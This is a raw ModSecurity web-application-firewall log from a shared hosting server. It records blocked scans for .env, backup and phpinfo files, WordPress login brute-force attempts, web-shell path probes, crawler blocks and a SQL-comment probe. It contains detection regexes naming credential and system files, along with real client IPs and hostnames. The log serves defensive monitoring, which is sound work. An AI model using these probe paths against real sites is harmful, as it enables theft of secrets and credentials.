[Tue May 26 14:45:55.622352 2026] [security2:error] [pid 636820:tid 636983] [client 195.178.110.34:58556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/awstats/.env"] [unique_id "ahVky6_r6oOphPch7B-bvwAAACE"]
[Tue May 26 14:45:55.653778 2026] [security2:error] [pid 636820:tid 637054] [client 65.111.27.128:61461] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkyq_r6oOphPch7B-boAAAAGg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:56.634184 2026] [security2:error] [pid 636820:tid 636962] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkzK_r6oOphPch7B-bygAAAAw"]
[Tue May 26 14:45:57.630938 2026] [security2:error] [pid 636820:tid 637045] [client 14.191.157.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkza_r6oOphPch7B-b4wAAAF8"]
[Tue May 26 14:45:58.050423 2026] [security2:error] [pid 636820:tid 636975] [client 216.26.245.175:23559] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkzK_r6oOphPch7B-b2AAAABk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:58.808946 2026] [security2:error] [pid 636820:tid 637034] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkzq_r6oOphPch7B-cCQAAAFQ"]
[Tue May 26 14:45:59.363005 2026] [security2:error] [pid 636820:tid 636991] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/awstats/.env"] [unique_id "ahVkz6_r6oOphPch7B-cJwAAACk"]
[Tue May 26 14:45:59.520796 2026] [security2:error] [pid 636820:tid 637072] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/conf/.env"] [unique_id "ahVkz6_r6oOphPch7B-cLAAAAHo"]
[Tue May 26 14:45:59.714733 2026] [security2:error] [pid 636820:tid 637076] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/cron/.env"] [unique_id "ahVkz6_r6oOphPch7B-cNgAAAH4"]
[Tue May 26 14:45:59.899064 2026] [security2:error] [pid 636820:tid 637036] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/www/.env"] [unique_id "ahVkz6_r6oOphPch7B-cPAAAAFY"]
[Tue May 26 14:46:00.093123 2026] [security2:error] [pid 636820:tid 637022] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/docker/.env"] [unique_id "ahVk0K_r6oOphPch7B-cSQAAAEg"]
[Tue May 26 14:46:00.305435 2026] [security2:error] [pid 636820:tid 636976] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/docker/app/.env"] [unique_id "ahVk0K_r6oOphPch7B-cUQAAABo"]
[Tue May 26 14:46:00.355900 2026] [security2:error] [pid 636820:tid 637012] [client 209.50.171.227:39185] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkz6_r6oOphPch7B-cJQAAAD4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:00.535979 2026] [security2:error] [pid 636820:tid 637024] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/env.backup"] [unique_id "ahVk0K_r6oOphPch7B-cVAAAAEo"]
[Tue May 26 14:46:00.734547 2026] [security2:error] [pid 636820:tid 636987] [client 195.178.110.34:58560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/xampp/phpinfo.php"] [unique_id "ahVk0K_r6oOphPch7B-cYAAAACU"]
[Tue May 26 14:46:00.753253 2026] [security2:error] [pid 636820:tid 636950] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk0K_r6oOphPch7B-cUgAAAAA"]
[Tue May 26 14:46:00.917889 2026] [security2:error] [pid 636820:tid 636968] [client 64.233.173.131:58235] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVk0K_r6oOphPch7B-cTwAAABI"]
[Tue May 26 14:46:00.919000 2026] [security2:error] [pid 636820:tid 637050] [client 64.233.173.133:47959] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVkz6_r6oOphPch7B-cIQAAAGQ"]
[Tue May 26 14:46:01.108310 2026] [security2:error] [pid 636820:tid 637043] [client 195.178.110.34:58576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/lara/info.php"] [unique_id "ahVk0a_r6oOphPch7B-caAAAAF0"]
[Tue May 26 14:46:01.457429 2026] [security2:error] [pid 636820:tid 637070] [client 195.178.110.34:58580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/lara/phpinfo.php"] [unique_id "ahVk0a_r6oOphPch7B-cdAAAAHg"]
[Tue May 26 14:46:01.771244 2026] [security2:error] [pid 636820:tid 637075] [client 195.178.110.34:58588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/laravel/info.php"] [unique_id "ahVk0a_r6oOphPch7B-cfgAAAH0"]
[Tue May 26 14:46:02.088707 2026] [security2:error] [pid 636820:tid 637012] [client 195.178.110.34:58604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.vscode/.env"] [unique_id "ahVk0q_r6oOphPch7B-cggAAAD4"]
[Tue May 26 14:46:02.549336 2026] [security2:error] [pid 636820:tid 637055] [client 104.207.37.145:11761] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk0a_r6oOphPch7B-ccgAAAGk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:02.756465 2026] [security2:error] [pid 636820:tid 636956] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk0q_r6oOphPch7B-ciAAAAAY"]
[Tue May 26 14:46:03.354574 2026] [security2:error] [pid 636820:tid 637067] [client 114.119.156.185:39741] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/showshoe"] [unique_id "ahVk06_r6oOphPch7B-cqQAAAHU"], referer: http://rohiniventures.com/blog/category/showshoe
[Tue May 26 14:46:04.332523 2026] [security2:error] [pid 636820:tid 636979] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk06_r6oOphPch7B-cuQAAAB0"]
[Tue May 26 14:46:04.370057 2026] [security2:error] [pid 636820:tid 637059] [client 130.12.182.60:33580] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVk06_r6oOphPch7B-cvQAAAG0"], referer: https://anujtradingco.com/wp-admin/
[Tue May 26 14:46:04.829281 2026] [security2:error] [pid 636820:tid 637061] [client 209.50.189.143:16299] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk06_r6oOphPch7B-crQAAAG8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:05.888188 2026] [security2:error] [pid 636820:tid 637028] [client 216.26.234.236:40651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.234.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk1a_r6oOphPch7B-c6wAAAE4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:06.614892 2026] [security2:error] [pid 636820:tid 637065] [client 195.178.110.34:53292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/js/.env"] [unique_id "ahVk1q_r6oOphPch7B-c_wAAAHM"]
[Tue May 26 14:46:06.819875 2026] [security2:error] [pid 636820:tid 637001] [client 20.104.227.76:23986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "facebookverification.net.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVk1q_r6oOphPch7B-dCgAAADM"]
[Tue May 26 14:46:07.399749 2026] [security2:error] [pid 636820:tid 637052] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk1q_r6oOphPch7B-dEAAAAGY"]
[Tue May 26 14:46:08.221169 2026] [security2:error] [pid 636820:tid 636974] [client 65.111.12.182:13617] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk16_r6oOphPch7B-dFwAAABg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:08.682868 2026] [security2:error] [pid 636820:tid 636973] [client 216.244.66.241:43272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item/cl010301torquconverteroil.php"] [unique_id "ahVk2K_r6oOphPch7B-dRQAAABc"]
[Tue May 26 14:46:08.682989 2026] [security2:error] [pid 636820:tid 636973] [client 216.244.66.241:43272] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item/cl010301torquconverteroil.php"] [unique_id "ahVk2K_r6oOphPch7B-dRQAAABc"]
[Tue May 26 14:46:08.754837 2026] [security2:error] [pid 636820:tid 636992] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk2K_r6oOphPch7B-dOAAAACo"]
[Tue May 26 14:46:10.174775 2026] [security2:error] [pid 636820:tid 636952] [client 20.12.190.196:55173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVk2q_r6oOphPch7B-dgwAAAAI"]
[Tue May 26 14:46:10.174882 2026] [security2:error] [pid 636820:tid 636952] [client 20.12.190.196:55173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVk2q_r6oOphPch7B-dgwAAAAI"]
[Tue May 26 14:46:10.261813 2026] [security2:error] [pid 636820:tid 637053] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk2a_r6oOphPch7B-ddQAAAGc"]
[Tue May 26 14:46:10.416140 2026] [security2:error] [pid 636820:tid 637030] [client 45.3.41.26:11467] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk2a_r6oOphPch7B-dYAAAAFA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:11.327938 2026] [security2:error] [pid 636820:tid 636980] [client 20.12.190.196:55257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVk26_r6oOphPch7B-dpQAAAB4"]
[Tue May 26 14:46:11.328048 2026] [security2:error] [pid 636820:tid 636980] [client 20.12.190.196:55257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVk26_r6oOphPch7B-dpQAAAB4"]
[Tue May 26 14:46:12.674854 2026] [security2:error] [pid 636820:tid 636978] [client 216.26.240.128:44947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk26_r6oOphPch7B-drAAAABw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:12.754450 2026] [security2:error] [pid 636820:tid 636944] [remote 203.172.89.21:38506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.89.172.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVk3K_r6oOphPch7B-dygAAKHs"]
[Tue May 26 14:46:12.898500 2026] [security2:error] [pid 636820:tid 637055] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk3K_r6oOphPch7B-dyQAAAGk"]
[Tue May 26 14:46:13.489984 2026] [security2:error] [pid 636820:tid 636994] [client 20.104.227.76:23982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "facebookverification.net.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVk3a_r6oOphPch7B-d6AAAACw"]
[Tue May 26 14:46:13.492797 2026] [security2:error] [pid 636820:tid 636960] [client 195.178.110.34:37228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/js/.env"] [unique_id "ahVk3a_r6oOphPch7B-d6QAAAAo"]
[Tue May 26 14:46:14.825316 2026] [security2:error] [pid 636820:tid 637043] [client 45.3.43.21:37931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk3a_r6oOphPch7B-d7wAAAF0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:15.262150 2026] [security2:error] [pid 636820:tid 637067] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk3q_r6oOphPch7B-eBwAAAHU"]
[Tue May 26 14:46:16.147821 2026] [security2:error] [pid 636820:tid 637052] [client 65.111.28.105:39311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.28.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk36_r6oOphPch7B-eHgAAAGY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:16.951249 2026] [security2:error] [pid 636820:tid 637029] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk4K_r6oOphPch7B-eMAAAAE8"]
[Tue May 26 14:46:17.926946 2026] [security2:error] [pid 636820:tid 636969] [client 185.191.171.16:19012] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVk4a_r6oOphPch7B-eYQAAABM"]
[Tue May 26 14:46:17.927087 2026] [security2:error] [pid 636820:tid 636969] [client 185.191.171.16:19012] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVk4a_r6oOphPch7B-eYQAAABM"]
[Tue May 26 14:46:18.297783 2026] [security2:error] [pid 636820:tid 636830] [remote 45.148.10.95:54668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.kingsclubmembership.com"] [uri "/*update.cgi*"] [unique_id "ahVk4q_r6oOphPch7B-ebgAAegk"]
[Tue May 26 14:46:18.373584 2026] [security2:error] [pid 636820:tid 637024] [client 45.3.38.80:30809] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk4a_r6oOphPch7B-eTwAAAEo"], referer: https://velanstore.ca/wp-login.php
